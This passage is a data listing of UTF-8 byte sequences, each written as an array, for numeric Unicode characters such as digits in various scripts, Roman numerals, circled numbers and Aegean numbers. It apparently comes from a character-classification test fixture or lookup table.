[ 224, 177, 173 ],
[ 224, 177, 174 ],
[ 224, 177, 175 ],
[ 224, 177, 184 ],
[ 224, 177, 185 ],
[ 224, 177, 186 ],
[ 224, 177, 187 ],
[ 224, 177, 188 ],
[ 224, 177, 189 ],
[ 224, 177, 190 ],
[ 224, 179, 166 ],
[ 224, 179, 167 ],
[ 224, 179, 168 ],
[ 224, 179, 169 ],
[ 224, 179, 170 ],
[ 224, 179, 171 ],
[ 224, 179, 172 ],
[ 224, 179, 173 ],
[ 224, 179, 174 ],
[ 224, 179, 175 ],
[ 224, 181, 166 ],
[ 224, 181, 167 ],
[ 224, 181, 168 ],
[ 224, 181, 169 ],
[ 224, 181, 170 ],
[ 224, 181, 171 ],
[ 224, 181, 172 ],
[ 224, 181, 173 ],
[ 224, 181, 174 ],
[ 224, 181, 175 ],
[ 224, 181, 176 ],
[ 224, 181, 177 ],
[ 224, 181, 178 ],
[ 224, 181, 179 ],
[ 224, 181, 180 ],
[ 224, 181, 181 ],
[ 224, 183, 166 ],
[ 224, 183, 167 ],
[ 224, 183, 168 ],
[ 224, 183, 169 ],
[ 224, 183, 170 ],
[ 224, 183, 171 ],
[ 224, 183, 172 ],
[ 224, 183, 173 ],
[ 224, 183, 174 ],
[ 224, 183, 175 ],
[ 224, 185, 144 ],
[ 224, 185, 145 ],
[ 224, 185, 146 ],
[ 224, 185, 147 ],
[ 224, 185, 148 ],
[ 224, 185, 149 ],
[ 224, 185, 150 ],
[ 224, 185, 151 ],
[ 224, 185, 152 ],
[ 224, 185, 153 ],
[ 224, 187, 144 ],
[ 224, 187, 145 ],
[ 224, 187, 146 ],
[ 224, 187, 147 ],
[ 224, 187, 148 ],
[ 224, 187, 149 ],
[ 224, 187, 150 ],
[ 224, 187, 151 ],
[ 224, 187, 152 ],
[ 224, 187, 153 ],
[ 224, 188, 160 ],
[ 224, 188, 161 ],
[ 224, 188, 162 ],
[ 224, 188, 163 ],
[ 224, 188, 164 ],
[ 224, 188, 165 ],
[ 224, 188, 166 ],
[ 224, 188, 167 ],
[ 224, 188, 168 ],
[ 224, 188, 169 ],
[ 224, 188, 170 ],
[ 224, 188, 171 ],
[ 224, 188, 172 ],
[ 224, 188, 173 ],
[ 224, 188, 174 ],
[ 224, 188, 175 ],
[ 224, 188, 176 ],
[ 224, 188, 177 ],
[ 224, 188, 178 ],
[ 224, 188, 179 ],
[ 225, 129, 128 ],
[ 225, 129, 129 ],
[ 225, 129, 130 ],
[ 225, 129, 131 ],
[ 225, 129, 132 ],
[ 225, 129, 133 ],
[ 225, 129, 134 ],
[ 225, 129, 135 ],
[ 225, 129, 136 ],
[ 225, 129, 137 ],
[ 225, 130, 144 ],
[ 225, 130, 145 ],
[ 225, 130, 146 ],
[ 225, 130, 147 ],
[ 225, 130, 148 ],
[ 225, 130, 149 ],
[ 225, 130, 150 ],
[ 225, 130, 151 ],
[ 225, 130, 152 ],
[ 225, 130, 153 ],
[ 225, 141, 169 ],
[ 225, 141, 170 ],
[ 225, 141, 171 ],
[ 225, 141, 172 ],
[ 225, 141, 173 ],
[ 225, 141, 174 ],
[ 225, 141, 175 ],
[ 225, 141, 176 ],
[ 225, 141, 177 ],
[ 225, 141, 178 ],
[ 225, 141, 179 ],
[ 225, 141, 180 ],
[ 225, 141, 181 ],
[ 225, 141, 182 ],
[ 225, 141, 183 ],
[ 225, 141, 184 ],
[ 225, 141, 185 ],
[ 225, 141, 186 ],
[ 225, 141, 187 ],
[ 225, 141, 188 ],
[ 225, 155, 174 ],
[ 225, 155, 175 ],
[ 225, 155, 176 ],
[ 225, 159, 160 ],
[ 225, 159, 161 ],
[ 225, 159, 162 ],
[ 225, 159, 163 ],
[ 225, 159, 164 ],
[ 225, 159, 165 ],
[ 225, 159, 166 ],
[ 225, 159, 167 ],
[ 225, 159, 168 ],
[ 225, 159, 169 ],
[ 225, 159, 176 ],
[ 225, 159, 177 ],
[ 225, 159, 178 ],
[ 225, 159, 179 ],
[ 225, 159, 180 ],
[ 225, 159, 181 ],
[ 225, 159, 182 ],
[ 225, 159, 183 ],
[ 225, 159, 184 ],
[ 225, 159, 185 ],
[ 225, 160, 144 ],
[ 225, 160, 145 ],
[ 225, 160, 146 ],
[ 225, 160, 147 ],
[ 225, 160, 148 ],
[ 225, 160, 149 ],
[ 225, 160, 150 ],
[ 225, 160, 151 ],
[ 225, 160, 152 ],
[ 225, 160, 153 ],
[ 225, 165, 134 ],
[ 225, 165, 135 ],
[ 225, 165, 136 ],
[ 225, 165, 137 ],
[ 225, 165, 138 ],
[ 225, 165, 139 ],
[ 225, 165, 140 ],
[ 225, 165, 141 ],
[ 225, 165, 142 ],
[ 225, 165, 143 ],
[ 225, 167, 144 ],
[ 225, 167, 145 ],
[ 225, 167, 146 ],
[ 225, 167, 147 ],
[ 225, 167, 148 ],
[ 225, 167, 149 ],
[ 225, 167, 150 ],
[ 225, 167, 151 ],
[ 225, 167, 152 ],
[ 225, 167, 153 ],
[ 225, 167, 154 ],
[ 225, 170, 128 ],
[ 225, 170, 129 ],
[ 225, 170, 130 ],
[ 225, 170, 131 ],
[ 225, 170, 132 ],
[ 225, 170, 133 ],
[ 225, 170, 134 ],
[ 225, 170, 135 ],
[ 225, 170, 136 ],
[ 225, 170, 137 ],
[ 225, 170, 144 ],
[ 225, 170, 145 ],
[ 225, 170, 146 ],
[ 225, 170, 147 ],
[ 225, 170, 148 ],
[ 225, 170, 149 ],
[ 225, 170, 150 ],
[ 225, 170, 151 ],
[ 225, 170, 152 ],
[ 225, 170, 153 ],
[ 225, 173, 144 ],
[ 225, 173, 145 ],
[ 225, 173, 146 ],
[ 225, 173, 147 ],
[ 225, 173, 148 ],
[ 225, 173, 149 ],
[ 225, 173, 150 ],
[ 225, 173, 151 ],
[ 225, 173, 152 ],
[ 225, 173, 153 ],
[ 225, 174, 176 ],
[ 225, 174, 177 ],
[ 225, 174, 178 ],
[ 225, 174, 179 ],
[ 225, 174, 180 ],
[ 225, 174, 181 ],
[ 225, 174, 182 ],
[ 225, 174, 183 ],
[ 225, 174, 184 ],
[ 225, 174, 185 ],
[ 225, 177, 128 ],
[ 225, 177, 129 ],
[ 225, 177, 130 ],
[ 225, 177, 131 ],
[ 225, 177, 132 ],
[ 225, 177, 133 ],
[ 225, 177, 134 ],
[ 225, 177, 135 ],
[ 225, 177, 136 ],
[ 225, 177, 137 ],
[ 225, 177, 144 ],
[ 225, 177, 145 ],
[ 225, 177, 146 ],
[ 225, 177, 147 ],
[ 225, 177, 148 ],
[ 225, 177, 149 ],
[ 225, 177, 150 ],
[ 225, 177, 151 ],
[ 225, 177, 152 ],
[ 225, 177, 153 ],
[ 226, 129, 176 ],
[ 226, 129, 180 ],
[ 226, 129, 181 ],
[ 226, 129, 182 ],
[ 226, 129, 183 ],
[ 226, 129, 184 ],
[ 226, 129, 185 ],
[ 226, 130, 128 ],
[ 226, 130, 129 ],
[ 226, 130, 130 ],
[ 226, 130, 131 ],
[ 226, 130, 132 ],
[ 226, 130, 133 ],
[ 226, 130, 134 ],
[ 226, 130, 135 ],
[ 226, 130, 136 ],
[ 226, 130, 137 ],
[ 226, 133, 144 ],
[ 226, 133, 145 ],
[ 226, 133, 146 ],
[ 226, 133, 147 ],
[ 226, 133, 148 ],
[ 226, 133, 149 ],
[ 226, 133, 150 ],
[ 226, 133, 151 ],
[ 226, 133, 152 ],
[ 226, 133, 153 ],
[ 226, 133, 154 ],
[ 226, 133, 155 ],
[ 226, 133, 156 ],
[ 226, 133, 157 ],
[ 226, 133, 158 ],
[ 226, 133, 159 ],
[ 226, 133, 160 ],
[ 226, 133, 161 ],
[ 226, 133, 162 ],
[ 226, 133, 163 ],
[ 226, 133, 164 ],
[ 226, 133, 165 ],
[ 226, 133, 166 ],
[ 226, 133, 167 ],
[ 226, 133, 168 ],
[ 226, 133, 169 ],
[ 226, 133, 170 ],
[ 226, 133, 171 ],
[ 226, 133, 172 ],
[ 226, 133, 173 ],
[ 226, 133, 174 ],
[ 226, 133, 175 ],
[ 226, 133, 176 ],
[ 226, 133, 177 ],
[ 226, 133, 178 ],
[ 226, 133, 179 ],
[ 226, 133, 180 ],
[ 226, 133, 181 ],
[ 226, 133, 182 ],
[ 226, 133, 183 ],
[ 226, 133, 184 ],
[ 226, 133, 185 ],
[ 226, 133, 186 ],
[ 226, 133, 187 ],
[ 226, 133, 188 ],
[ 226, 133, 189 ],
[ 226, 133, 190 ],
[ 226, 133, 191 ],
[ 226, 134, 128 ],
[ 226, 134, 129 ],
[ 226, 134, 130 ],
[ 226, 134, 133 ],
[ 226, 134, 134 ],
[ 226, 134, 135 ],
[ 226, 134, 136 ],
[ 226, 134, 137 ],
[ 226, 145, 160 ],
[ 226, 145, 161 ],
[ 226, 145, 162 ],
[ 226, 145, 163 ],
[ 226, 145, 164 ],
[ 226, 145, 165 ],
[ 226, 145, 166 ],
[ 226, 145, 167 ],
[ 226, 145, 168 ],
[ 226, 145, 169 ],
[ 226, 145, 170 ],
[ 226, 145, 171 ],
[ 226, 145, 172 ],
[ 226, 145, 173 ],
[ 226, 145, 174 ],
[ 226, 145, 175 ],
[ 226, 145, 176 ],
[ 226, 145, 177 ],
[ 226, 145, 178 ],
[ 226, 145, 179 ],
[ 226, 145, 180 ],
[ 226, 145, 181 ],
[ 226, 145, 182 ],
[ 226, 145, 183 ],
[ 226, 145, 184 ],
[ 226, 145, 185 ],
[ 226, 145, 186 ],
[ 226, 145, 187 ],
[ 226, 145, 188 ],
[ 226, 145, 189 ],
[ 226, 145, 190 ],
[ 226, 145, 191 ],
[ 226, 146, 128 ],
[ 226, 146, 129 ],
[ 226, 146, 130 ],
[ 226, 146, 131 ],
[ 226, 146, 132 ],
[ 226, 146, 133 ],
[ 226, 146, 134 ],
[ 226, 146, 135 ],
[ 226, 146, 136 ],
[ 226, 146, 137 ],
[ 226, 146, 138 ],
[ 226, 146, 139 ],
[ 226, 146, 140 ],
[ 226, 146, 141 ],
[ 226, 146, 142 ],
[ 226, 146, 143 ],
[ 226, 146, 144 ],
[ 226, 146, 145 ],
[ 226, 146, 146 ],
[ 226, 146, 147 ],
[ 226, 146, 148 ],
[ 226, 146, 149 ],
[ 226, 146, 150 ],
[ 226, 146, 151 ],
[ 226, 146, 152 ],
[ 226, 146, 153 ],
[ 226, 146, 154 ],
[ 226, 146, 155 ],
[ 226, 147, 170 ],
[ 226, 147, 171 ],
[ 226, 147, 172 ],
[ 226, 147, 173 ],
[ 226, 147, 174 ],
[ 226, 147, 175 ],
[ 226, 147, 176 ],
[ 226, 147, 177 ],
[ 226, 147, 178 ],
[ 226, 147, 179 ],
[ 226, 147, 180 ],
[ 226, 147, 181 ],
[ 226, 147, 182 ],
[ 226, 147, 183 ],
[ 226, 147, 184 ],
[ 226, 147, 185 ],
[ 226, 147, 186 ],
[ 226, 147, 187 ],
[ 226, 147, 188 ],
[ 226, 147, 189 ],
[ 226, 147, 190 ],
[ 226, 147, 191 ],
[ 226, 157, 182 ],
[ 226, 157, 183 ],
[ 226, 157, 184 ],
[ 226, 157, 185 ],
[ 226, 157, 186 ],
[ 226, 157, 187 ],
[ 226, 157, 188 ],
[ 226, 157, 189 ],
[ 226, 157, 190 ],
[ 226, 157, 191 ],
[ 226, 158, 128 ],
[ 226, 158, 129 ],
[ 226, 158, 130 ],
[ 226, 158, 131 ],
[ 226, 158, 132 ],
[ 226, 158, 133 ],
[ 226, 158, 134 ],
[ 226, 158, 135 ],
[ 226, 158, 136 ],
[ 226, 158, 137 ],
[ 226, 158, 138 ],
[ 226, 158, 139 ],
[ 226, 158, 140 ],
[ 226, 158, 141 ],
[ 226, 158, 142 ],
[ 226, 158, 143 ],
[ 226, 158, 144 ],
[ 226, 158, 145 ],
[ 226, 158, 146 ],
[ 226, 158, 147 ],
[ 226, 179, 189 ],
[ 227, 128, 135 ],
[ 227, 128, 161 ],
[ 227, 128, 162 ],
[ 227, 128, 163 ],
[ 227, 128, 164 ],
[ 227, 128, 165 ],
[ 227, 128, 166 ],
[ 227, 128, 167 ],
[ 227, 128, 168 ],
[ 227, 128, 169 ],
[ 227, 128, 184 ],
[ 227, 128, 185 ],
[ 227, 128, 186 ],
[ 227, 134, 146 ],
[ 227, 134, 147 ],
[ 227, 134, 148 ],
[ 227, 134, 149 ],
[ 227, 136, 160 ],
[ 227, 136, 161 ],
[ 227, 136, 162 ],
[ 227, 136, 163 ],
[ 227, 136, 164 ],
[ 227, 136, 165 ],
[ 227, 136, 166 ],
[ 227, 136, 167 ],
[ 227, 136, 168 ],
[ 227, 136, 169 ],
[ 227, 137, 136 ],
[ 227, 137, 137 ],
[ 227, 137, 138 ],
[ 227, 137, 139 ],
[ 227, 137, 140 ],
[ 227, 137, 141 ],
[ 227, 137, 142 ],
[ 227, 137, 143 ],
[ 227, 137, 145 ],
[ 227, 137, 146 ],
[ 227, 137, 147 ],
[ 227, 137, 148 ],
[ 227, 137, 149 ],
[ 227, 137, 150 ],
[ 227, 137, 151 ],
[ 227, 137, 152 ],
[ 227, 137, 153 ],
[ 227, 137, 154 ],
[ 227, 137, 155 ],
[ 227, 137, 156 ],
[ 227, 137, 157 ],
[ 227, 137, 158 ],
[ 227, 137, 159 ],
[ 227, 138, 128 ],
[ 227, 138, 129 ],
[ 227, 138, 130 ],
[ 227, 138, 131 ],
[ 227, 138, 132 ],
[ 227, 138, 133 ],
[ 227, 138, 134 ],
[ 227, 138, 135 ],
[ 227, 138, 136 ],
[ 227, 138, 137 ],
[ 227, 138, 177 ],
[ 227, 138, 178 ],
[ 227, 138, 179 ],
[ 227, 138, 180 ],
[ 227, 138, 181 ],
[ 227, 138, 182 ],
[ 227, 138, 183 ],
[ 227, 138, 184 ],
[ 227, 138, 185 ],
[ 227, 138, 186 ],
[ 227, 138, 187 ],
[ 227, 138, 188 ],
[ 227, 138, 189 ],
[ 227, 138, 190 ],
[ 227, 138, 191 ],
[ 234, 152, 160 ],
[ 234, 152, 161 ],
[ 234, 152, 162 ],
[ 234, 152, 163 ],
[ 234, 152, 164 ],
[ 234, 152, 165 ],
[ 234, 152, 166 ],
[ 234, 152, 167 ],
[ 234, 152, 168 ],
[ 234, 152, 169 ],
[ 234, 155, 166 ],
[ 234, 155, 167 ],
[ 234, 155, 168 ],
[ 234, 155, 169 ],
[ 234, 155, 170 ],
[ 234, 155, 171 ],
[ 234, 155, 172 ],
[ 234, 155, 173 ],
[ 234, 155, 174 ],
[ 234, 155, 175 ],
[ 234, 160, 176 ],
[ 234, 160, 177 ],
[ 234, 160, 178 ],
[ 234, 160, 179 ],
[ 234, 160, 180 ],
[ 234, 160, 181 ],
[ 234, 163, 144 ],
[ 234, 163, 145 ],
[ 234, 163, 146 ],
[ 234, 163, 147 ],
[ 234, 163, 148 ],
[ 234, 163, 149 ],
[ 234, 163, 150 ],
[ 234, 163, 151 ],
[ 234, 163, 152 ],
[ 234, 163, 153 ],
[ 234, 164, 128 ],
[ 234, 164, 129 ],
[ 234, 164, 130 ],
[ 234, 164, 131 ],
[ 234, 164, 132 ],
[ 234, 164, 133 ],
[ 234, 164, 134 ],
[ 234, 164, 135 ],
[ 234, 164, 136 ],
[ 234, 164, 137 ],
[ 234, 167, 144 ],
[ 234, 167, 145 ],
[ 234, 167, 146 ],
[ 234, 167, 147 ],
[ 234, 167, 148 ],
[ 234, 167, 149 ],
[ 234, 167, 150 ],
[ 234, 167, 151 ],
[ 234, 167, 152 ],
[ 234, 167, 153 ],
[ 234, 167, 176 ],
[ 234, 167, 177 ],
[ 234, 167, 178 ],
[ 234, 167, 179 ],
[ 234, 167, 180 ],
[ 234, 167, 181 ],
[ 234, 167, 182 ],
[ 234, 167, 183 ],
[ 234, 167, 184 ],
[ 234, 167, 185 ],
[ 234, 169, 144 ],
[ 234, 169, 145 ],
[ 234, 169, 146 ],
[ 234, 169, 147 ],
[ 234, 169, 148 ],
[ 234, 169, 149 ],
[ 234, 169, 150 ],
[ 234, 169, 151 ],
[ 234, 169, 152 ],
[ 234, 169, 153 ],
[ 234, 175, 176 ],
[ 234, 175, 177 ],
[ 234, 175, 178 ],
[ 234, 175, 179 ],
[ 234, 175, 180 ],
[ 234, 175, 181 ],
[ 234, 175, 182 ],
[ 234, 175, 183 ],
[ 234, 175, 184 ],
[ 234, 175, 185 ],
[ 239, 188, 144 ],
[ 239, 188, 145 ],
[ 239, 188, 146 ],
[ 239, 188, 147 ],
[ 239, 188, 148 ],
[ 239, 188, 149 ],
[ 239, 188, 150 ],
[ 239, 188, 151 ],
[ 239, 188, 152 ],
[ 239, 188, 153 ],
[ 240, 144, 132, 135 ],
[ 240, 144, 132, 136 ],
[ 240, 144, 132, 137 ],
[ 240, 144, 132, 138 ],
[ 240, 144, 132, 139 ],
[ 240, 144, 132, 140 ],
[ 240, 144, 132, 141 ],
[ 240, 144, 132, 142 ],
[ 240, 144, 132, 143 ],
[ 240, 144, 132, 144 ],
[ 240, 144, 132, 145 ],
[ 240, 144, 132, 146 ],
[ 240, 144, 132, 147 ],
[ 240, 144, 132, 148 ],
[ 240, 144, 132, 149 ],
[ 240, 144, 132, 150 ],
[ 240, 144, 132, 151 ],
[ 240, 144, 132, 152 ],
[ 240, 144, 132, 153 ],
[ 240, 144, 132, 154 ],
[ 240, 144, 132, 155 ],
[ 240, 144, 132, 156 ],
[ 240, 144, 132, 157 ],
[ 240, 144, 132, 158 ],
[ 240, 144, 132, 159 ],
[ 240, 144, 132, 160 ],
[ 240, 144, 132, 161 ],
[ 240, 144, 132, 162 ],
[ 240, 144, 132, 163 ],
[ 240, 144, 132, 164 ],
[ 240, 144, 132, 165 ],
[ 240, 144, 132, 166 ],
[ 240, 144, 132, 167 ],
[ 240, 144, 132, 168 ],
[ 240, 144, 132, 169 ],
[ 240, 144, 132, 170 ],
[ 240, 144, 132, 171 ],
[ 240, 144, 132, 172 ],
[ 240, 144, 132, 173 ],
[ 240, 144, 132, 174 ],
[ 240, 144, 132, 175 ],
[ 240, 144, 132, 176 ],
[ 240, 144, 132, 177 ],
[ 240, 144, 132, 178 ],
[ 240, 144, 132, 179 ],
[ 240, 144, 133, 128 ],
[ 240, 144, 133, 129 ],
[ 240, 144, 133, 130 ],
[ 240, 144, 133, 131 ],
[ 240, 144, 133, 132 ],
[ 240, 144, 133, 133 ],
[ 240, 144, 133, 134 ],
[ 240, 144, 133, 135 ],
[ 240, 144, 133, 136 ],
[ 240, 144, 133, 137 ],
[ 240, 144, 133, 138 ],
[ 240, 144, 133, 139 ],
[ 240, 144, 133, 140 ],
[ 240, 144, 133, 141 ],
[ 240, 144, 133, 142 ],
[ 240, 144, 133, 143 ],
[ 240, 144, 133, 144 ],
[ 240, 144, 133, 145 ],
[ 240, 144, 133, 146 ],
[ 240, 144, 133, 147 ],
[ 240, 144, 133, 148 ],
[ 240, 144, 133, 149 ],
[ 240, 144, 133, 150 ],
[ 240, 144, 133, 151 ],
[ 240, 144, 133, 152 ],
[ 240, 144, 133, 153 ],
[ 240, 144, 133, 154 ],
[ 240, 144, 133, 155 ],
[ 240, 144, 133, 156 ],
[ 240, 144, 133, 157 ],
[ 240, 144, 133, 158 ],
[ 240, 144, 133, 159 ],
[ 240, 144, 133, 160 ],
[ 240, 144, 133, 161 ],
[ 240, 144, 133, 162 ],
[ 240, 144, 133, 163 ],
[ 240, 144, 133, 164 ],
[ 240, 144, 133, 165 ],
[ 240, 144, 133, 166 ],
[ 240, 144, 133, 167 ],
[ 240, 144, 133, 168 ],
[ 240, 144, 133, 169 ],
[ 240, 144, 133, 170 ],
[ 240, 144, 133, 171 ],
[ 240, 144, 133, 172 ],
[ 240, 144, 133, 173 ],
[ 240, 144, 133, 174 ],
[ 240, 144, 133, 175 ],
[ 240, 144, 133, 176 ],
[ 240, 144, 133, 177 ],
[ 240, 144, 133, 178 ],
[ 240, 144, 133, 179 ],
[ 240, 144, 133, 180 ],
[ 240, 144, 133, 181 ],
[ 240, 144, 133, 182 ],
[ 240, 144, 133, 183 ],
[ 240, 144, 133, 184 ],
[ 240, 144, 134, 138 ],
[ 240, 144, 134, 139 ],
[ 240, 144, 139, 161 ],
[ 240, 144, 139, 162 ],
[ 240, 144, 139, 163 ],
[ 240, 144, 139, 164 ],
[ 240, 144, 139, 165 ],
[ 240, 144, 139, 166 ],
[ 240, 144, 139, 167 ],
[ 240, 144, 139, 168 ],
[ 240, 144, 139, 169 ],
[ 240, 144, 139, 170 ],
[ 240, 144, 139, 171 ],
[ 240, 144, 139, 172 ],
[ 240, 144, 139, 173 ],
[ 240, 144, 139, 174 ],
[ 240, 144, 139, 175 ],
[ 240, 144, 139, 176 ],
[ 240, 144, 139, 177 ],
[ 240, 144, 139, 178 ],
[ 240, 144, 139, 179 ],
[ 240, 144, 139, 180 ],
[ 240, 144, 139, 181 ],
[ 240, 144, 139, 182 ],
[ 240, 144, 139, 183 ],
[ 240, 144, 139, 184 ],
[ 240, 144, 139, 185 ],
[ 240, 144, 139, 186 ],
[ 240, 144, 139, 187 ],
[ 240, 144, 140, 160 ],
[ 240, 144, 140, 161 ],
[ 240, 144, 140, 162 ],
[ 240, 144, 140, 163 ],
[ 240, 144, 141, 129 ],
[ 240, 144, 141, 138 ],
[ 240, 144, 143, 145 ],
[ 240, 144, 143, 146 ],
[ 240, 144, 143, 147 ],
[ 240, 144, 143, 148 ],
[ 240, 144, 143, 149 ],
[ 240, 144, 146, 160 ],
[ 240, 144, 146, 161 ],
[ 240, 144, 146, 162 ],
[ 240, 144, 146, 163 ],
[ 240, 144, 146, 164 ],
[ 240, 144, 146, 165 ],
[ 240, 144, 146, 166 ],
[ 240, 144, 146, 167 ],
[ 240, 144, 146, 168 ],
[ 240, 144, 146, 169 ],
[ 240, 144, 161, 152 ],
[ 240, 144, 161, 153 ],
[ 240, 144, 161, 154 ],
[ 240, 144, 161, 155 ],
[ 240, 144, 161, 156 ],
[ 240, 144, 161, 157 ],
[ 240, 144, 161, 158 ],
[ 240, 144, 161, 159 ],
[ 240, 144, 161, 185 ],
[ 240, 144, 161, 186 ],
[ 240, 144, 161, 187 ],
[ 240, 144, 161, 188 ],
[ 240, 144, 161, 189 ],
[ 240, 144, 161, 190 ],
[ 240, 144, 161, 191 ],
[ 240, 144, 162, 167 ],
[ 240, 144, 162, 168 ],
[ 240, 144, 162, 169 ],
[ 240, 144, 162, 170 ],
[ 240, 144, 162, 171 ],
[ 240, 144, 162, 172 ],
[ 240, 144, 162, 173 ],
[ 240, 144, 162, 174 ],
[ 240, 144, 162, 175 ],
[ 240, 144, 163, 187 ],
[ 240, 144, 163, 188 ],
[ 240, 144, 163, 189 ],
[ 240, 144, 163, 190 ],
[ 240, 144, 163, 191 ],
[ 240, 144, 164, 150 ],
[ 240, 144, 164, 151 ],
[ 240, 144, 164, 152 ],
[ 240, 144, 164, 153 ],
[ 240, 144, 164, 154 ],
[ 240, 144, 164, 155 ],
[ 240, 144, 166, 188 ],
[ 240, 144, 166, 189 ],
[ 240, 144, 167, 128 ],
[ 240, 144, 167, 129 ],
[ 240, 144, 167, 130 ],
[ 240, 144, 167, 131 ],
[ 240, 144, 167, 132 ],
[ 240, 144, 167, 133 ],
[ 240, 144, 167, 134 ],
[ 240, 144, 167, 135 ],
[ 240, 144, 167, 136 ],
[ 240, 144, 167, 137 ],
[ 240, 144, 167, 138 ],
[ 240, 144, 167, 139 ],
[ 240, 144, 167, 140 ],
[ 240, 144, 167, 141 ],
[ 240, 144, 167, 142 ],
[ 240, 144, 167, 143 ],
[ 240, 144, 167, 146 ],
[ 240, 144, 167, 147 ],
[ 240, 144, 167, 148 ],
[ 240, 144, 167, 149 ],
[ 240, 144, 167, 150 ],
[ 240, 144, 167, 151 ],
[ 240, 144, 167, 152 ],
[ 240, 144, 167, 153 ],
[ 240, 144, 167, 154 ],
[ 240, 144, 167, 155 ],
[ 240, 144, 167, 156 ],
[ 240, 144, 167, 157 ],
[ 240, 144, 167, 158 ],
[ 240, 144, 167, 159 ],
[ 240, 144, 167, 160 ],
[ 240, 144, 167, 161 ],
[ 240, 144, 167, 162 ],
[ 240, 144, 167, 163 ],
[ 240, 144, 167, 164 ],
[ 240, 144, 167, 165 ],
[ 240, 144, 167, 166 ],
[ 240, 144, 167, 167 ],
[ 240, 144, 167, 168 ],
[ 240, 144, 167, 169 ],
[ 240, 144, 167, 170 ],
[ 240, 144, 167, 171 ],
[ 240, 144, 167, 172 ],
[ 240, 144, 167, 173 ],
[ 240, 144, 167, 174 ],
[ 240, 144, 167, 175 ],
[ 240, 144, 167, 176 ],
[ 240, 144, 167, 177 ],
[ 240, 144, 167, 178 ],
[ 240, 144, 167, 179 ],
[ 240, 144, 167, 180 ],
[ 240, 144, 167, 181 ],
[ 240, 144, 167, 182 ],
[ 240, 144, 167, 183 ],
[ 240, 144, 167, 184 ],
[ 240, 144, 167, 185 ],
[ 240, 144, 167, 186 ],
[ 240, 144, 167, 187 ],
[ 240, 144, 167, 188 ],
[ 240, 144, 167, 189 ],
[ 240, 144, 167, 190 ],
[ 240, 144, 167, 191 ],
[ 240, 144, 169, 128 ],
[ 240, 144, 169, 129 ],
[ 240, 144, 169, 130 ],
[ 240, 144, 169, 131 ],
[ 240, 144, 169, 132 ],
[ 240, 144, 169, 133 ],
[ 240, 144, 169, 134 ],
[ 240, 144, 169, 135 ],
[ 240, 144, 169, 189 ],
[ 240, 144, 169, 190 ],
[ 240, 144, 170, 157 ],
[ 240, 144, 170, 158 ],
[ 240, 144, 170, 159 ],
[ 240, 144, 171, 171 ],
[ 240, 144, 171, 172 ],
[ 240, 144, 171, 173 ],
[ 240, 144, 171, 174 ],
[ 240, 144, 171, 175 ],
[ 240, 144, 173, 152 ],
[ 240, 144, 173, 153 ],
[ 240, 144, 173, 154 ],
[ 240, 144, 173, 155 ],
[ 240, 144, 173, 156 ],
[ 240, 144, 173, 157 ],
[ 240, 144, 173, 158 ],
[ 240, 144, 173, 159 ],
[ 240, 144, 173, 184 ],
[ 240, 144, 173, 185 ],
[ 240, 144, 173, 186 ],
[ 240, 144, 173, 187 ],
[ 240, 144, 173, 188 ],
[ 240, 144, 173, 189 ],
[ 240, 144, 173, 190 ],
[ 240, 144, 173, 191 ],
[ 240, 144, 174, 169 ],
[ 240, 144, 174, 170 ],
[ 240, 144, 174, 171 ],
[ 240, 144, 174, 172 ],
[ 240, 144, 174, 173 ],
[ 240, 144, 174, 174 ],
[ 240, 144, 174, 175 ],
[ 240, 144, 179, 186 ],
[ 240, 144, 179, 187 ],
[ 240, 144, 179, 188 ],
[ 240, 144, 179, 189 ],
[ 240, 144, 179, 190 ],
[ 240, 144, 179, 191 ],
[ 240, 144, 185, 160 ],
[ 240, 144, 185, 161 ],
[ 240, 144, 185, 162 ],
[ 240, 144, 185, 163 ],
[ 240, 144, 185, 164 ],
[ 240, 144, 185, 165 ],
[ 240, 144, 185, 166 ],
[ 240, 144, 185, 167 ],
[ 240, 144, 185, 168 ],
[ 240, 144, 185, 169 ],
[ 240, 144, 185, 170 ],
[ 240, 144, 185, 171 ],
[ 240, 144, 185, 172 ],
[ 240, 144, 185, 173 ],
[ 240, 144, 185, 174 ],
[ 240, 144, 185, 175 ],
[ 240, 144, 185, 176 ],
[ 240, 144, 185, 177 ],
[ 240, 144, 185, 178 ],
[ 240, 144, 185, 179 ],
[ 240, 144, 185, 180 ],
[ 240, 144, 185, 181 ],
[ 240, 144, 185, 182 ],
[ 240, 144, 185, 183 ],
[ 240, 144, 185, 184 ],
[ 240, 144, 185, 185 ],
[ 240, 144, 185, 186 ],
[ 240, 144, 185, 187 ],
[ 240, 144, 185, 188 ],
[ 240, 144, 185, 189 ],
[ 240, 144, 185, 190 ],
[ 240, 145, 129, 146 ],
[ 240, 145, 129, 147 ],
[ 240, 145, 129, 148 ],
[ 240, 145, 129, 149 ],
[ 240, 145, 129, 150 ],
[ 240, 145, 129, 151 ],
[ 240, 145, 129, 152 ],
[ 240, 145, 129, 153 ],
[ 240, 145, 129, 154 ],
[ 240, 145, 129, 155 ],
[ 240, 145, 129, 156 ],
[ 240, 145, 129, 157 ],
[ 240, 145, 129, 158 ],
[ 240, 145, 129, 159 ],
[ 240, 145, 129, 160 ],
[ 240, 145, 129, 161 ],
[ 240, 145, 129, 162 ],
[ 240, 145, 129, 163 ],
[ 240, 145, 129, 164 ],
[ 240, 145, 129, 165 ],
[ 240, 145, 129, 166 ],
[ 240, 145, 129, 167 ],
[ 240, 145, 129, 168 ],
[ 240, 145, 129, 169 ],
[ 240, 145, 129, 170 ],
[ 240, 145, 129, 171 ],
[ 240, 145, 129, 172 ],
[ 240, 145, 129, 173 ],
[ 240, 145, 129, 174 ],
[ 240, 145, 129, 175 ],
[ 240, 145, 131, 176 ],
[ 240, 145, 131, 177 ],
[ 240, 145, 131, 178 ],
[ 240, 145, 131, 179 ],
[ 240, 145, 131, 180 ],
[ 240, 145, 131, 181 ],
[ 240, 145, 131, 182 ],
[ 240, 145, 131, 183 ],
[ 240, 145, 131, 184 ],
[ 240, 145, 131, 185 ],
[ 240, 145, 132, 182 ],
[ 240, 145, 132, 183 ],
[ 240, 145, 132, 184 ],
[ 240, 145, 132, 185 ],
[ 240, 145, 132, 186 ],
[ 240, 145, 132, 187 ],
[ 240, 145, 132, 188 ],
[ 240, 145, 132, 189 ],
[ 240, 145, 132, 190 ],
[ 240, 145, 132, 191 ],
[ 240, 145, 135, 144 ],
[ 240, 145, 135, 145 ],
[ 240, 145, 135, 146 ],
[ 240, 145, 135, 147 ],
[ 240, 145, 135, 148 ],
[ 240, 145, 135, 149 ],
[ 240, 145, 135, 150 ],
[ 240, 145, 135, 151 ],
[ 240, 145, 135, 152 ],
[ 240, 145, 135, 153 ],
[ 240, 145, 135, 161 ],
